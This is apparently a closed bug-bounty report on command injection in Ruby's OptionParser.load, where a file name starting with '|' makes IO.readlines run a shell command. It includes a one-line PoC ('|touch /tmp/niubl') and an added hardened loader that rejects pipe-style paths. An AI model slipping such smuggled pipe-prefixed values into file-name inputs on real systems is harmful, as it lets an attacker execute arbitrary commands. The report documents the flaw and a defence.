Command injection in OptionParser.load
Low
## Vulnerability Details
The `OptionParser.load` function uses `IO.readlines` to read the file, so a file name of the form `| command` can be injected to execute a command.
PoC:
```
require 'optparse'
OptionParser.new do |opts|
  opts.load("|touch /tmp/niubl")
end.parse!
```
## Impact
The command may be executed unintentionally.
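
A hardened loader for the pattern reported above, as an added example (not code from the report or from optparse): the hypothetical helpers `read_option_lines` and `load_options_file` reject pipe-style names and read through `File.open`, which always treats its argument as a filesystem path. The options file and marker path are constructed for the demo.

```ruby
require 'optparse'
require 'tmpdir'

# Hypothetical helper (not part of optparse): read an options file without
# ever handing the name to IO.readlines, where a leading "|" means "run this".
def read_option_lines(path)
  path = String(path)
  raise ArgumentError, "pipe-style path rejected: #{path.inspect}" if path.lstrip.start_with?('|')
  raise ArgumentError, "not a regular file: #{path.inspect}" unless File.file?(path)
  # File.open never spawns a subprocess for a "|"-prefixed name.
  File.open(path, 'r') { |f| f.each_line(chomp: true).to_a }
end

# Parse the file's lines with a caller-supplied OptionParser.
def load_options_file(parser, path)
  parser.parse(read_option_lines(path))
end

# Constructed demo: one valid options file and the PoC-shaped file name.
def demo
  Dir.mktmpdir do |dir|
    marker = File.join(dir, 'marker')
    opts_file = File.join(dir, 'app.options')
    File.write(opts_file, "--verbose\n--name=demo\n")

    seen = {}
    parser = OptionParser.new do |o|
      o.on('--verbose') { seen[:verbose] = true }
      o.on('--name=NAME') { |v| seen[:name] = v }
    end
    load_options_file(parser, opts_file)

    rejected = begin
      load_options_file(parser, "|touch #{marker}")
      false
    rescue ArgumentError
      true
    end
    { seen: seen, rejected: rejected, marker_created: File.exist?(marker) }
  end
end

p demo if __FILE__ == $PROGRAM_NAME
```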
## Report Stats
- Report ID: 1090678
- State: Closed
- Substate: not-applicable
- Upvotes: 1